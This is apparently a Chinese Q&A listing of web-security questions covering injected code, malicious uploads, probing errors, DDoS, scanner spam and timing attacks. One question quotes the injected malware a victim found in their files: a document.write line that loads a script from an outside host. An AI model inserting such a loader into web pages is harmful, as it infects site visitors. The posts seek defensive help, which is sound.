server-side-attacks

1熱度

1回答

我在我的Rails應用程序中設置了一個Exception notifier。所以，今天我拿到了第二個通知，該index模板丟失： An ActionView::MissingTemplate occurred in products#index: Missing template products/index, application/index with {:locale=>[:en, :d

0熱度

1回答

攻擊HTML和Javascript文件

我在我的IIS服務器中有很多javascript和html文件。幾天前，一些奇怪的代碼注入到文件中。下面的代碼。 /*ec8243*/ document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>'); /*/ec8243*/

-1熱度

1回答

如何防止人們將有害文件上傳到我的網站？

簡而言之，我有一個網頁，允許用戶將文件上傳到我的網站，然後顯示他們上傳的任何鏈接。上傳允許上傳任何文件類型，並將其存儲在名爲「uploads」的公用文件夾中。我可以預見這會帶來很多安全風險。例如，如果用戶上傳HTML文件，則在打開時它會呈現爲網頁 - 它們可能會重定向到此處的病毒等。我希望網站儘可能開放 - 我喜歡上傳者允許用戶將網頁添加到我的網站。但是，我需要它爲用戶（和我）提供安全和安全

0熱度

1回答

這是可能的攻擊嗎？我可以避免它嗎？

今天我來了，我的應用程序中有200個（自動）錯誤記錄在我的日誌中。我不確定這是攻擊還是我的IIS或我的應用程序中的奇怪現象。錯誤是一樣的，因爲有人試圖去一個不存在的頁面。錯誤是：虛空CheckVirtualFileExists（System.Web.VirtualPath）例如，我有我的Login.aspx，我有19個errros，有人試圖在沒有按本19頁進入」噸存在： Login_bac

-1熱度

2回答

Apache服務器計時花費很長時間

我遇到麻煩幫我找出問題，我已經在我的Apache服務器上運行了我的網站很長一段時間了，最近遇到了一個讓我難倒的問題。我的服務器在過去一直被DDOS攻擊，要求我將我的服務器移到代理/ WAF後面。有一段時間，我在Sucuri的背後，因爲它提供了當時最好的負擔得起的防禦。這些攻擊逐漸消失，我轉移到Cloudflare免費保護我的IP地址，同時減輕我每月的服務器成本。開關很順暢，一切都很好，工作了

-2熱度

1回答

5300多消息，我的網站有JS內容

我創建了一個網站，我在1天內收到5300多消息，有一個JavaScript內容我解決問題，停止郵件添加CAPTCHA ，但我想知道什麼是該消息的內容是的javascript：window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink（）

-3熱度

1回答

什麼是定時攻擊？

我聽說過這個詞，但我在互聯網上找不到那麼多關於它的信息。什麼是與Web服務器腳本相關的定時攻擊？有沒有方法來對付這種攻擊？